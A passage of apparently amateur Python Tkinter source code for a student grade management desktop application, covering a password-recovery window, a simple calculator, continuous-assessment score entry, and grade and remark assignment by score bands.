btnCp.pack()\r\n data.close()\r\n RegCP.mainloop()\r\n\r\ndef forgetpass():\r\n global username\r\n username=StringVar()\r\n Reg1=Toplevel()\r\n Reg1.title(\"recover password page\")\r\n Reg1.iconbitmap(\"favico.ico\")\r\n Reg1.resizable(width=False, height=False)\r\n Reg1.config(bg=\"brown\")\r\n\r\n frame12=Frame(Reg1, bg =\"#BFBFBF\", relief=FLAT)\r\n frame12.pack()\r\n frameFP=LabelFrame(frame12,bg =\"white\", relief=RIDGE, bd=3)\r\n frameFP.pack()\r\n labelf=Label(frameFP, justify=LEFT,width=27, text=\"please confirm\" + \"\\n\" + \"username\" + \"\\n\" + \r\n \"by entering your number below\", bg='#BFBFBF',\r\n font=(\"Arial Rounded MT Bold\",13))\r\n labelf.pack()\r\n\r\n logo2 = ImageTk.PhotoImage(Image.open(\"qm.jpg\"))\r\n\r\n\r\n\r\n fp=Label(frame12, image=logo2)\r\n fp.pack()\r\n\r\n #\r\n #labelf=Label(frame12, justify=LEFT, text=\"please confirm\" + \"\\n\" + \"your phone number\" + \"\\n\" + \r\n #\"by entering your number below\", bg='#BFBFBF',\r\n #font=(\"Arial Rounded MT Bold\",8))\r\n #labelf.place(x=7,y=7)\r\n frameFQ=LabelFrame(frame12,bg =\"#BFBFBF\", relief=RIDGE, bd=3)\r\n frameFQ.pack()\r\n\r\n FNlabelw=Label(frameFQ,width=42, text=\"username*\", bg='#BFBFBF',font=(\"Arial Rounded MT Bold\",8),pady=10)\r\n FNlabelw.pack()\r\n FNentryw =Entry(frameFQ, relief= RIDGE,width=30,bd=1,bg =\"white\", show=\"*\", justify= CENTER, textvariable=username)\r\n FNentryw.pack(ipady=8) \r\n bitt2=Button(frameFQ,width=20, text=\"submit\",bg =\"#BFBFBF\", relief=FLAT,command=confirmPN)\r\n bitt2.pack()\r\n Reg1.mainloop()\r\n\r\ndef rad3(value):\r\n if r==1:\r\n Window4()\r\n else:\r\n Window3() \r\ndef cancel():\r\n global cancel\r\n response=messagebox.askokcancel()\r\n#def slide(var):\r\n # txtdisplay.configure(height=horiz.get(), width=vert.get())\r\n\r\n\r\n\r\n\r\ndef button_click(number):\r\n #caE.delete(0, END)\r\n current = caE.get()\r\n caE.delete(0, END)\r\n caE.insert(0, str(current) + str(number))\r\ndef button_equals():\r\n second_number=caE.get()\r\n caE.delete(0, END)\r\n try:\r\n if smath==\"addition\":\r\n result =f_num + int(second_number)\r\n caE.insert(0, result)\r\n if smath==\"divide\":\r\n result =f_num / int(second_number)\r\n caE.insert(0, result)\r\n if smath==\"multiply\":\r\n result = f_num * int(second_number)\r\n caE.insert(0,result)\r\n if smath==\"substraction\":\r\n result = f_num - int(second_number)\r\n caE.insert(0, result)\r\n except ValueError and NameError:\r\n caE.insert(0, \"syntax error\")\r\n\r\ndef checkca1():\r\n if var1.get()==1:\r\n ca1E.configure(state=NORMAL)\r\n ca1E.focus()\r\n ca1E.delete(0, END)\r\n elif var1.get()==0:\r\n ca1E.configure(state=DISABLED)\r\ndef checkca2():\r\n if var2.get()==1:\r\n ca2E.configure(state=NORMAL)\r\n ca2E.focus()\r\n ca2E.delete(0, END)\r\n elif var2.get()==0:\r\n ca2E.configure(state=DISABLED)\r\ndef checkca3():\r\n if var3.get()==1:\r\n ca3E.configure(state=NORMAL)\r\n ca3E.focus()\r\n ca3E.delete(0, END)\r\n elif var3.get()==0:\r\n ca3E.configure(state=DISABLED)\r\ndef checkca4():\r\n if var4.get()==1:\r\n ca4E.configure(state=NORMAL)\r\n ca4E.focus()\r\n ca4E.delete(0, END)\r\n elif var4.get()==0:\r\n ca4E.configure(state=DISABLED)\r\ndef checkca5():\r\n if var5.get()==1:\r\n ca5E.configure(state=NORMAL)\r\n ca5E.focus()\r\n ca5E.delete(0, END)\r\n elif var5.get()==0:\r\n ca5E.configure(state=DISABLED)\r\n\r\n\r\n\r\ndef button_add():\r\n first_number=caE.get()\r\n global f_num\r\n global smath\r\n smath=\"addition\"\r\n f_num = int(first_number)\r\n caE.delete(0, END)\r\ndef button_substract():\r\n first_number=caE.get()\r\n global f_num\r\n global smath\r\n smath=\"substraction\"\r\n f_num = int(first_number)\r\n caE.delete(0, END)\r\ndef button_multiply():\r\n first_number=caE.get()\r\n global f_num\r\n global smath\r\n smath=\"multiply\"\r\n f_num = int(first_number)\r\n caE.delete(0, END)\r\ndef button_divide():\r\n first_number=caE.get()\r\n global f_num\r\n global smath\r\n smath=\"divide\"\r\n f_num = int(first_number)\r\n caE.delete(0, END)\r\ndef button_clears():\r\n caE.delete(0, END)\r\n caE.insert(0, \"0\")\r\n\r\ndef reset():\r\n var1.set(0)\r\n var2.set(0)\r\n var3.set(0)\r\n var4.set(0)\r\n var5.set(0)\r\n ca11.set(\"0\")\r\n ca22.set(\"0\")\r\n ca33.set(\"0\")\r\n ca44.set(\"0\")\r\n ex1.set(\"0\")\r\n caE.delete(0, END)\r\n ca1E.configure(state=DISABLED)\r\n ca2E.configure(state=DISABLED)\r\n ca3E.configure(state=DISABLED)\r\n ca4E.configure(state=DISABLED)\r\n ca5E.configure(state=DISABLED)\r\n LBfn.delete(0, END)\r\n LBln.delete(0, END)\r\n #f_name.set(\"0\")\r\n #L_name.set(\"0\")\r\n #ca_ttl.set(\"0\")\r\n #exm_ttl.set(\"0\")\r\n #avg.set(\"0\")\r\n #cle_ttl.set(\"0\")\r\n pos2.current(0)\r\n term4.current(0)\r\n LBCT.delete(0, END)\r\n LBET.delete(0, END)\r\n LBCAT.delete(0, END)\r\n LBremark.delete(0,END)\r\n #txtdisplay.delete(1.0, END)\r\n #txtdisplay.insert(1.0, \"FIRST NAME\\t\\t\" + \"LAST NAME\\t\\t\\t\" + \"1st C.A\\t\\t\"+ \"2nd C.A\\t\\t\"+ \"3rd C.A\\t\\t\"+ \"4th C.A\\t\\t\"+ \"C.A total\\t\\t\"+ \"Exam total\\t\\t\"+ \"average\\t\\t\")\r\n\r\n\r\ndef finish():\r\n f_name1=f_name.get()\r\n L_name1=L_name.get()\r\n avge1=avge.get()\r\n tex1=(ca5E.get())\r\n tca44=(ca4E.get()) \r\n tca33=(ca3E.get())\r\n tca11=(ca1E.get())\r\n tca22=(ca2E.get())\r\n sub_n=subject_name.get()\r\n gd= LBET.get()\r\n txtdisplay.insert(1.0, \"\\n\\n\" + str(f_name1) + \"\\t\\t\" + str(L_name1) + \"\\t\\t\\t\" + str(tca11) + \"\\t\\t\" + str(tca22) + \"\\t\\t\" + \r\n str(tca33) + \"\\t\\t\" + str(tca44) + \"\\t\\t\\t\\t\" + str(tex1) + \"\\t\\t\" + str(total1) + \"\\t\\t\" + str(total2) + \"\\t\\t\" + str(gd) + \"\\t\\t\" +str(avge1))\r\n txtdisplay.insert(1.0, \"\\nFIRST NAME\\t\\t\" + \"LAST NAME\\t\\t\\t\" + \"1st C.A\\t\\t\"+ \"2nd C.A\\t\\t\"+ \"3rd C.A\\t\\t\"+ \"4th C.A\\t\\t\\t\\t\" + \"Examination\\t\\t\" + \"C.A total\\t\\t\" + \"total\\t\\t\"\r\n + \"grade\\t\\t\" + \"remark\\t\\t\" + \"\\n\")\r\n txtdisplay.insert(1.0, \"\\nSUBJECT :\" + str(sub_n) + \"\\n\")\r\n \r\n \r\n #txtdisplay.insert(1.0, + str(L_name1))\r\n #txtdisplay.insert(1.0, str(tca11) + \"\\t\\t\")\r\n #txtdisplay.insert(1.0, str(tca22) + \"\\t\\t\")\r\n #txtdisplay.insert(1.0, str(tca33) + \"\\t\\t\")\r\n #txtdisplay.insert(1.0, str(tca44) + \"\\t\\t\")\r\n #txtdisplay.insert(1.0, str(tex1) + \"\\t\\t\")\r\n #txtdisplay.insert(1.0, str(total1) + \"\\t\\t\")\r\n #txtdisplay.insert(1.0, str(total2) + \"\\t\\t\")\r\n #txtdisplay.insert(1.0, str(avge1))\r\n\r\ndef total():\r\n tca111=int(ca1E.get())\r\n tca222=int(ca2E.get())\r\n tca333=int(ca3E.get())\r\n tca444=int(ca4E.get())\r\n tex11=int(ca5E.get())\r\n tex1=(ca5E.get())\r\n tca44=(ca4E.get()) \r\n tca33=(ca3E.get())\r\n tca11=(ca1E.get())\r\n tca22=(ca2E.get())\r\n\r\n if re.search('[a-z]', tex1) and re.search('[A-Z]', tex1):\r\n response=messagebox.showerror(\"...\",\"input contains an alphabet\")\r\n ca5E.delete(0, END)\r\n if re.search('[a-z]', tca44) and re.search('[A-Z]', tca44):\r\n response=messagebox.showerror(\"...\",\"input contains an alphabet\")\r\n ca4E.delete(0, END)\r\n if re.search('[a-z]', tca33) and re.search('[A-Z]', tca33):\r\n response=messagebox.showerror(\"...\",\"input contains an alphabet\")\r\n ca3E.delete(0, END)\r\n if re.search('[a-z]', tca11) and re.search('[A-Z]', tca11):\r\n response=messagebox.showerror(\"...\",\"input contains an alphabet\")\r\n ca1E.delete(0, END)\r\n if re.search('[a-z]', tca22) and re.search('[A-Z]', tca22):\r\n response=messagebox.showerror(\"...\",\"input contains am alpha\")\r\n ca2E.delete(0, END)\r\n else:\r\n global total1\r\n total1=(tca444 + tca333 + tca222 + tca111)\r\n global total2\r\n total2= int(total1) + int(tex1)\r\n LBCT.insert(0, str(total1))\r\n #LBET.insert(0, str(tex1))\r\n LBCAT.insert(0, str(total2))\r\n #t1 = [74, 75,76,77,78,7,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,07,98,99,]\r\n\r\n #for total2 in range(74-100):\r\n # LBremark.insert(0, 'EXCELLENT')\r\n #else:\r\n # pass\r\n if total2 in list(range(74,101)):\r\n LBremark.insert(0, \" EXCELLENT\")\r\n elif total2 in list(range(69,75)):\r\n LBremark.insert(0, 'V.GOOD')\r\n elif total2 in list(range(64,70)):\r\n LBremark.insert(0, \"GOOD\")\r\n elif total2 in list(range(50,65)):\r\n LBremark.insert(0, 'CREDIT')\r\n elif total2 in list(range(39,50)):\r\n LBremark.insert(0,'PASS')\r\n elif total2 in list(range(17,40)):\r\n LBremark.insert(0, 'WEAK PASS')\r\n elif total2 < 17:\r\n LBremark.insert(0, 'FAIL')\r\n elif total2 > 100:\r\n response=messagebox.showinfo('OOPS', 'values dont correspond')\r\n else:\r\n response=messagebox.showinfo('OOPS', 'SCORE IS OVER')\r\n #avge.set(\"EXCELLENT\")\r\n\r\n\r\n\r\n\r\n if total2 in list(range(69,101)):\r\n LBET.insert(0, \"A1\")\r\n elif total2 in list(range(60,70)):\r\n LBET.insert(0, 'B2') \r\n elif total2 in list(range(60,65)):\r\n LBET.insert(0, \"B3\")\r\n elif total2 in list(range(54,60)):\r\n LBET.insert(0, 'C4')\r\n elif total2 in list(range(49,55)):\r\n LBET.insert(0,'C5')\r\n elif total2 in list(range(45,50)):\r\n LBET.insert(0, 'C6')\r\n elif total2 in list(range(39,45)):\r\n LBET.insert(0, 'D7')\r\n elif total2 in list(range(17,40)):\r\n LBET.insert(0, 'E8')\r\n elif total2 < 17:\r\n LBET.insert(0, 'F9')\r\n \r\n else:\r\n response=messagebox.showinfo('OOPS', 'SCORE IS OVER')\r\n\r\n \r\ndef Window3():\r\n Reg4.destroy()\r\n root.withdraw()\r\n global Window3\r\n global Reg3\r\n global caE\r\n Reg5=Toplevel()\r\n Reg5.title(\"SUBJECT TEACHER\")\r\n Reg5.iconbitmap(\"favico.ico\")\r\n Reg5.resizable(width=False, height=False)\r\n Reg5.geometry(\"1270x650+0+0\")\r\n #Reg2.overrideredirect(True)\r\n #Reg2.transient(1)\r\n #Reg2.protocol(\"WM_DELETE_WINDOW\", CancelCommand)\r\n Reg5.config(bg=\"#77c593\")\r\n #===========sliders====================\r\n global my_canvas\r\n main_frame= Frame(Reg5,)\r\n main_frame.pack(side=RIGHT,fill=BOTH, expand=1)#pady=20\r\n my_canvas= Canvas(main_frame,width=200,height=400)\r\n my_canvas.pack(side=LEFT,fill=BOTH, expand =1)\r\n my_scrollbar=Scrollbar(main_frame, orient=VERTICAL,command=my_canvas.yview)\r\n my_scrollbar.pack(side=RIGHT ,fill=Y)\r\n \r\n my_canvas.configure(yscrollcommand=my_scrollbar.set)\r\n my_canvas.bind('', lambda e:my_canvas.configure(scrollregion=my_canvas.bbox(\"all\")))\r\n student_info1=Frame(my_canvas, pady=5,bg=\"#EDEBFF\")\r\n my_canvas.create_window((0,0), window=student_info1, anchor=\"nw\")\r\n my_scrollbar1=Scrollbar(student_info1, orient=HORIZONTAL,command=my_canvas.xview)\r\n my_scrollbar1.pack(side=BOTTOM ,fill=X)#place(x=2, y=410, fill=X)place(x=2, y=410)\r\n my_canvas.configure(xscrollcommand=my_scrollbar1.set)\r\n my_canvas.bind('', lambda e:my_canvas.configure(scrollregion=my_canvas.bbox(\"all\")))\r\n #==========================slider down=================================================\r\n #main_frame1= Frame(Reg5)\r\n #main_frame1.place(x=1, y=1)\r\n #my_canvas1= Canvas(main_frame1,width=873,height=406)\r\n #my_canvas1.pack(side=TOP,fill=BOTH, expand =1)\r\n #my_scrollbar1.pack(side=BOTTOM ,fill=X)#place(x=2, y=410)#pack(side=BOTTOM ,fill=Y)\r\n #my_canvas1.configure(yscrollcommand=my_scrollbar1.set)\r\n #my_canvas1.bind('', lambda e:my_canvas1.configure(scrollregion=my_canvas1.bbox(\"all\")))\r\n #student_info11=Frame(my_canvas1, pady=5,bg=\"#FFF8DC\")\r\n #my_canvas1.create_window((0,0), window=student_info1, anchor=\"nw\")\r\n #=========================top===================================\r\n student_info=Frame(student_info1, pady=5,bg=\"#EDEBFF\", relief=FLAT,bd=12)\r\n #student_info111=Frame(student_info11, pady=5,bg=\"#FFF8DC\", relief=FLAT,bd=12)\r\n \r\n student_info.pack(side= TOP)\r\n # student_info111.pack()\r\n\r\n #my_canvas.create_window((0,0), window=student_info, anchor=\"nw\")\r\n my_menu=Menu(Reg5)\r\n Reg5.config(menu=my_menu)\r\n\r\n\r\n file_menu=Menu(my_menu)\r\n my_menu.add_cascade(label=\"file\",menu=file_menu)\r\n file_menu.add_command(label=\"New\")\r\n file_menu.add_separator()\r\n file_menu.add_command(label=\"open\")\r\n\r\n\r\n \r\n tool_menu=Menu(my_menu)\r\n my_menu.add_cascade(label=\"tools\",menu=file_menu)\r\n tool_menu.add_command(label=\"copy\")\r\n tool_menu.add_separator()\r\n tool_menu.add_command(label=\"cut\")\r\n fil_img1=PhotoImage(file=\"studentsss.png\")\r\n fil_img2= Label(student_info, image=fil_img1)\r\n fil_img2.pack(side=LEFT)\r\n lblTitle1= Label(student_info,width=30,height=1, text=\"student grade mangement system\",fg=\"#3B3434\",bg=\"#EDEBFF\", relief=FLAT,\r\n font=(\"chiller\",75,\"bold\"),justify=CENTER) \r\n lblTitle1.pack(side=RIGHT)\r\n\r\n\r\n #++++++++++++++++++++++++++++++++++++\r\n global subject_name\r\n\r\n subject_name=StringVar()\r\n subject_info2=Frame(Reg5,bg=\"#38ACC0\", relief=RIDGE, bd=2)\r\n\r\n student_info3=Frame(subject_info2,relief=FLAT, bd=1, borderwidth=0)\r\n social_lb1=Frame(student_info3, relief=FLAT,bd=2)\r\n fil_img=PhotoImage(file=\"file.png\")\r\n fil_btn=Button(social_lb1, image=fil_img,borderwidth=0)\r\n fil_btn.grid(row=0, column=0)\r\n \r\n lbl1=Label(social_lb1,width=10, text=\"new\",font=(\"chiller\", 25,'bold'))\r\n lbl1.grid(row=0, column=1)\r\n\r\n open_img=PhotoImage(file=\"file.png\")\r\n open_btn=Button(social_lb1, image=fil_img,borderwidth=0)\r\n open_btn.grid(row=1, column=0)\r\n \r\n lbl11=Label(social_lb1,width=10, text=\"open\",font=(\"chiller\", 25,'bold'))\r\n lbl11.grid(row=1, column=1)\r\n\r\n social_lb1.pack(side=TOP)\r\n \r\n social_lb3 = Frame(student_info3)\r\n lbl3=Label(social_lb3,width=10, text=\"subject\",font=(\"chiller\", 25,'bold'))\r\n lbl3.pack()\r\n sub3 = Entry(social_lb3 , textvariable=subject_name)\r\n sub3.pack()\r\n\r\n lbl4=Label(social_lb3,width=10, text=\"student no.\",font=(\"chiller\", 25,'bold'))\r\n lbl4.pack(padx=3)\r\n sub4 = Entry(social_lb3 )\r\n sub4.pack()\r\n\r\n social_lb3.pack()\r\n\r\n\r\n\r\n\r\n #sub11.pack(pady=10,ipady=13)\r\n social_lb11=Frame(student_info3)\r\n sub1 = Label(social_lb11, text=\"for more enquires, \\ncomplaints\", font=(\"chiller\", 25,'bold'))\r\n sub1.pack()\r\n fb_img=PhotoImage(file=\"iconfinder_facebook_834722.png\")\r\n fb_btn=Button(social_lb11, image=fb_img,borderwidth=0)\r\n fb_btn.pack(side=LEFT, padx=12)\r\n fb_im=PhotoImage(file=\"tw2.png\")\r\n fb_btn1=Button(social_lb11, image=fb_im,borderwidth=0)\r\n fb_btn1.pack(side=LEFT, padx=12)\r\n tw_im=PhotoImage(file=\"iconfinder_11-linkedin_104493.png\")\r\n tw_btn1=Button(social_lb11, image=tw_im,borderwidth=0)\r\n tw_btn1.pack(side=LEFT, padx=12)\r\n social_lb11.pack(pady=85)\r\n\r\n \r\n \r\n\r\n social_lb=Frame(student_info3)\r\n sub2 = Label(social_lb, text=\"Screen Copyright©\", font=(\"chiller\", 25,'bold'))\r\n sub2.pack(side=BOTTOM)\r\n \r\n social_lb.pack(side=BOTTOM, pady=85)\r\n\r\n\r\n\r\n\r\n student_info3.pack()\r\n subject_info2.pack(side=LEFT)\r\n\r\n #====================== left(subject info)===================================\r\n subject_info=Frame(student_info1,bg=\"#38ACC0\", relief=FLAT,bd=2)\r\n subject_info.pack(side=LEFT)\r\n #---------------------------------\r\n pos1 =[\"1st\",\"2nd\",\"3rd\",\"4th\",\"5th\",\"6th\",\"7th\",\"8th\",\"9th\",\"10th\",\"11th\",\"12th\",\"13th\",\"14th\",\"15th\",\"16th\",\"17th\",\"18th\",\"19th\",\"20th\",\r\n \"21st\",\"22nd\",\"23rd\",\"24th\",\"25th\",\"26th\",\"27th\",\"28th\",\"29th\",\"30th\",\"31st\",\"32nd\",\"33rd\",\"34th\",\"35th\",\"36th\",\"37th\",\"38th\",\"39th\",\"40th\",\r\n \"41st\",\"42nd\",\"43rd\",\"44th\",\"45th\",\"46th\",\"47th\",\"48th\",\"49th\",\"50th\",\"51st\",\"52nd\",\"53rd\",\"54th\",\"55th\",\"56th\",\"57th\",\"58th\",\"59th\",\"60th\"]\r\n term2=[\"1st\",\"2nd\",\"3rd\"]\r\n position1=StringVar()\r\n term1=StringVar()\r\n student_F=Frame(subject_info,bd=6,bg=\"#38ACC0\")\r\n student_F.configure(height=260, width=100)\r\n student_F.pack(side=TOP)\r\n #subject_f.place\r\n txtfn=Label(student_F,height=1,relief=FLAT,bg=\"#38ACC0\", width=12,text=\"First name \",font=(\"Harlow Solid Italic\", 20,'bold'))\r\n txtfn.grid(row=0,column=0,sticky=W)\r\n txtln=Label(student_F,height=1,width=12,relief=FLAT,bg=\"#38ACC0\",text=\"Other name\",font=(\"Harlow Solid Italic\", 20,'bold'))\r\n txtln.grid(row=1,column=0,sticky=W)\r\n \r\n #pos3=Label(student_f,relief=RIDGE, width=12,text=\"position\", bd=4,font=(\"helvetica\", 20,'bold'))\r\n #pos3.grid(row=2,column=0)\r\n global f_name\r\n global L_name\r\n global ca_ttl\r\n\r\n global avg\r\n global cle_ttl\r\n global pos2\r\n global term4\r\n\r\n f_name=StringVar()\r\n L_name=StringVar()\r\n ca_ttl=StringVar()\r\n \r\n avg=StringVar()\r\n cle_ttl=StringVar()\r\n\r\n global LBfn\r\n global LBln\r\n global LBET\r\n\r\n LBfn=Entry(student_F, width=25, bg =\"#E9DBDB\",font=(\"helvetica\", 15,'bold'),textvariable=f_name)\r\n LBfn.grid(row=0,column=1,ipady=3)\r\n LBln=Entry(student_F, width=25, bg =\"#E9DBDB\" ,font=(\"helvetica\", 15,'bold'),textvariable=L_name)\r\n LBln.grid(row=1,column=1,ipady=3)\r\n \r\n \r\n global LBCT\r\n \r\n global click6\r\n global click7\r\n global pos2\r\n global term4\r\n click6 =StringVar()\r\n click7= StringVar()\r\n \r\n \r\n #pos2= ttk.Combobox(student_F, value=pos1,width=23,font=(\"helvetica\", 10,'bold'))\r\n #pos2.current(0)\r\n #pos2.grid(row=4,column=1,ipady=5)\r\n term3=Label(student_F,relief=FLAT, width=12,text=\"Term\",bg=\"#38ACC0\",font=(\"Harlow Solid Italic\", 20,'bold'))\r\n #term3=Label(student_F,relief=RIDGE, width=12,text=\"term\",bg=\"#38ACC0\",font=(\"helvetica\", 20,'bold'))\r\n term3.grid(row=3,column=0,sticky=W)\r\n term4= ttk.Combobox(student_F, value=term2,width=23,font=(\"helvetica\", 14,'bold'))\r\n term4.current(0)\r\n term4.grid(row=3,column=1,ipady=5)\r\n \r\n \r\n global LBremark\r\n global avge\r\n avge = StringVar()\r\n \r\n \r\n global LBCAT\r\n \r\n \r\n \r\n\r\n \r\n #==========================================================================\r\n global var1\r\n global var2\r\n global var3\r\n global var4\r\n global var5\r\n global ca1\r\n global ca2\r\n global ca3\r\n global ca4\r\n global exams\r\n var1=IntVar()\r\n var2=IntVar()\r\n var3=IntVar()\r\n var4=IntVar()\r\n var5=IntVar()\r\n scores=Frame(subject_info,bd=10,bg=\"#38ACC0\", relief=FLAT)\r\n scores.pack(side=LEFT)\r\n \r\n ca1=Checkbutton(scores, text=\"First C.A\", bg=\"#38ACC0\",variable=var1, onvalue=1,offvalue=0,font=(\"Arial Rounded MT Bold\",20,\"bold\"), command=checkca1)\r\n ca1.grid(row=0,sticky=W)\r\n ca2=Checkbutton(scores, text=\"Second C.A\",bg=\"#38ACC0\", variable=var2, onvalue=1,offvalue=0,font=(\"Arial Rounded MT Bold\",20,\"bold\"), command=checkca2)\r\n ca2.grid(row=1,sticky=W)\r\n ca3=Checkbutton(scores, text=\"Third C.A\", bg=\"#38ACC0\",variable=var3, onvalue=1,offvalue=0,font=(\"Arial Rounded MT Bold\",20,\"bold\"), command=checkca3)\r\n ca3.grid(row=2,sticky=W)\r\n ca4=Checkbutton(scores, text=\"Fourth C.A\",bg=\"#38ACC0\", variable=var4, onvalue=1,offvalue=0,font=(\"Arial Rounded MT Bold\",20,\"bold\"), command=checkca4)\r\n ca4.grid(row=3,sticky=W)\r\n exams=Checkbutton(scores, text=\"Examination\",bg=\"#38ACC0\", variable=var5, onvalue=1,offvalue=0,font=(\"Arial Rounded MT Bold\",20,\"bold\"), command=checkca5)\r\n exams.grid(row=4,sticky=W)\r\n txtCT=Label(scores,relief=FLAT,height=1, width=12,bg=\"#38ACC0\",text=\"CA total\",justify=RIGHT, font=(\"Arial Rounded MT Bold\", 20,'bold'))\r\n txtCT.grid(row=5,sticky=W)\r\n \r\n pos3=Label(scores,relief=FLAT, width=12,height=1,bg=\"#38ACC0\",text=\"Position\",font=(\"Arial Rounded MT Bold\", 20,'bold'))\r\n pos3.grid(row=7,sticky=W)\r\n CATlb=Label(scores,relief=FLAT, width=12,bg=\"#38ACC0\",text=\"Total scores\", bd=4,font=(\"Arial Rounded MT Bold\", 20,'bold'))\r\n CATlb.grid(row=8,sticky=W)\r\n\r\n txtET=Label(scores, width=12,relief=FLAT,height=1,bg=\"#38ACC0\",text=\"grade\", font=(\"Arial Rounded MT Bold\", 20,'bold'))\r\n txtET.grid(row=9,column=0,sticky=W)\r\n avelb=Label(scores,relief=FLAT, width=12,bg=\"#38ACC0\",text=\"Remark\", bd=4,font=(\"Arial Rounded MT Bold\", 20,'bold'))\r\n avelb.grid(row=10,sticky=W,pady=11)\r\n #=========================================\r\n global ca11\r\n global ca22\r\n global ca33\r\n global ca44\r\n global ex1\r\n global ca1E\r\n global ca2E\r\n global ca3E\r\n global ca4E\r\n global ca5E\r\n ex1=IntVar()\r\n ca44=IntVar()\r\n ca33=IntVar()\r\n ca11=IntVar()\r\n ca22=IntVar()\r\n grades=Frame(subject_info,bd=10,relief=FLAT,bg=\"#38ACC0\")\r\n grades.pack(side=RIGHT)\r\n \r\n ca1E=Entry(grades, relief =FLAT, bd=3,bg=\"#E9DBDB\" ,justify=\"center\",font=(\"helvetica\", 20,'bold'), state=DISABLED,textvariable=ca11)\r\n ca1E.grid(row=0, sticky=W,ipady=5)\r\n ca2E=Entry(grades, relief =FLAT, bd=3,bg=\"#E9DBDB\", justify=\"center\",font=(\"helvetica\", 20,'bold'), state=DISABLED,textvariable=ca22)\r\n ca2E.grid(row=1, sticky=W,ipady=2)\r\n ca3E=Entry(grades, relief =FLAT, bd=3,bg=\"#E9DBDB\", justify=\"center\",font=(\"helvetica\", 20,'bold'), state=DISABLED,textvariable=ca33)\r\n ca3E.grid(row=2, sticky=W,ipady=2)\r\n ca4E=Entry(grades, relief =FLAT, bd=3,bg=\"#E9DBDB\", justify=\"center\",font=(\"helvetica\", 20,'bold'), state=DISABLED,textvariable=ca44)\r\n ca4E.grid(row=3, sticky=W,ipady=2)\r\n ca5E=Entry(grades, relief =FLAT, bd=3,bg=\"#E9DBDB\", justify=\"center\",font=(\"helvetica\", 20,'bold'), state=DISABLED,textvariable=ex1)\r\n ca5E.grid(row=4, sticky=W,ipady=3)\r\n LBCT=Entry(grades, bg =\"#E9DBDB\",width=19,font=(\"helvetica\", 21,'bold'),textvariable=ca_ttl)\r\n LBCT.grid(row=5,sticky=W,ipady=2)\r\n \r\n pos2= ttk.Combobox(grades, value=pos1,width=41,font=(\"helvetica\", 9,'bold'))\r\n pos2.current(0)\r\n pos2.grid(row=7,sticky=W,ipady=5,pady=2)\r\n LBCAT=Entry(grades, bg =\"#E9DBDB\",width=19,font=(\"helvetica\", 21,'bold'),textvariable=cle_ttl)\r\n global LBET\r\n LBCAT.grid(row=8,sticky=W,ipady=2)\r\n LBET=Entry(grades, bg =\"#E9DBDB\",width=19,font=(\"helvetica\", 21,'bold'))\r\n LBET.grid(row=9,sticky=W,ipady=2, pady=2)#column=1,\r\n LBremark=Entry(grades, bg =\"#E9DBDB\",width=19,font=(\"helvetica\", 21,'bold'),textvariable=avge)\r\n LBremark.grid(row=10,sticky=W,ipady=2,pady=8)\r\n\r\n #````````````````````````````````\r\n\r\n #pos1 =[\"1st\",\"2nd\",\"3rd\",\"4th\",\"5th\",\"6th\",\"7th\",\"8th\",\"9th\",\"10th\",\"11th\",\"12th\",\"13th\",\"14th\",\"15th\",\"16th\",\"17th\",\"18th\",\"19th\",\"20th\",\r\n #\"21st\",\"22nd\",\"23rd\",\"24th\",\"25th\",\"26th\",\"27th\",\"28th\",\"29th\",\"30th\",\"31st\",\"32nd\",\"33rd\",\"34th\",\"35th\",\"36th\",\"37th\",\"38th\",\"39th\",\"40th\",\r\n #\"41st\",\"42nd\",\"43rd\",\"44th\",\"45th\",\"46th\",\"47th\",\"48th\",\"49th\",\"50th\",\"51st\",\"52nd\",\"53rd\",\"54th\",\"55th\",\"56th\",\"57th\",\"58th\",\"59th\",\"60th\"]\r\n #position1=StringVar()\r\n\r\n \r\n subject_f=Frame(student_info1, relief=FLAT, bd=1)\r\n subject_f.place(x=5,y=585)\r\n\r\n #============================right(display options)=============================\r\n display=Frame(student_info1, relief=FLAT,bd=1,bg=\"#7a2048\")\r\n display.pack(side= RIGHT)\r\n \r\n #-------------buttons frame---------------------------------------\r\n Button_f=Frame(display,relief=FLAT,bd=5, bg=\"#7a2048\")\r\n Button_f.pack(side=BOTTOM)\r\n Button_ff=Frame(Button_f, bd=1 ,height =1,bg=\"#7a2048\")\r\n Button_ff.pack()\r\n Button_fff=LabelFrame(Button_f,bd=4,bg=\"#7a2048\")\r\n Button_fff.pack()\r\n global horiz\r\n global vert\r\n global txtdisplay\r\n txtdisplay=Text(Button_ff, bg =\"#E9DBDB\", bd=1,font=(\"helvetica\", 8,'bold'),wrap=\"none\" )\r\n txt_scrollbar=Scrollbar(Button_ff, orient=VERTICAL,command=txtdisplay.yview)\r\n txt_scrollbar.pack(side=RIGHT ,fill=Y)\r\n \r\n txtdisplay.configure(yscrollcommand=txt_scrollbar.set)\r\n txt1_scrollbar1=Scrollbar(Button_ff, orient=HORIZONTAL,command=txtdisplay.xview)\r\n txt1_scrollbar1.pack(side=BOTTOM ,fill=X)\r\n \r\n txtdisplay.configure(xscrollcommand=txt1_scrollbar1.set)\r\n #horiz=Scrollbar(txtdisplay,height=25)\r\n #horiz.config(command=txtdisplay.yview)\r\n #horiz.pack(anchor=E, fill=Y)\r\n #vert=Scale(txtdisplay, from_=0, to=100000,width=125, command=slide)\r\n #txtdisplay.insert(1.0, \"\\nFIRST NAME\\t\\t\" + \"LAST NAME\\t\\t\\t\" + \"1st C.A\\t\\t\"+ \"2nd C.A\\t\\t\"+ \"3rd C.A\\t\\t\"+ \"4th C.A\\t\\t\"+ \"C.A total\\t\\t\"+ \"Exam total\\t\\t\"+ \"average\\t\\t\")\r\n txtdisplay.configure(height=21,width=125)\r\n txtdisplay.pack()#grid(row=0,column=0,sticky=W)\r\n btntotal=Button(Button_fff,bg=\"#ecc19c\",relief=RIDGE, text=\"reset\", bd=3,font=(\"helvetica\", 20,'bold'),command=reset)\r\n btntotal.grid(row=1,column=0)\r\n btntotal=Button(Button_fff,relief =RIDGE,bg=\"#1e847f\", text=\"save\", bd=3,font=(\"helvetica\", 20,'bold'))\r\n btntotal.grid(row=1,column=1)\r\n btntotal=Button(Button_fff,relief =RIDGE,bg=\"#d9a5b3\", text=\"total\",bd=3,font=(\"helvetica\", 20,'bold'), command=total) \r\n btntotal.grid(row=1,column=2)\r\n btntotal=Button(Button_fff,relief =RIDGE,bg=\"#d9a5b3\", text=\"print\",bd=3,font=(\"helvetica\", 20,'bold'))\r\n btntotal.grid(row=1,column=4)\r\n btnfinish=Button(Button_fff,bg=\"#ecc19c\",relief=RIDGE, text=\"finish\", bd=3,font=(\"helvetica\", 20,'bold'),command= 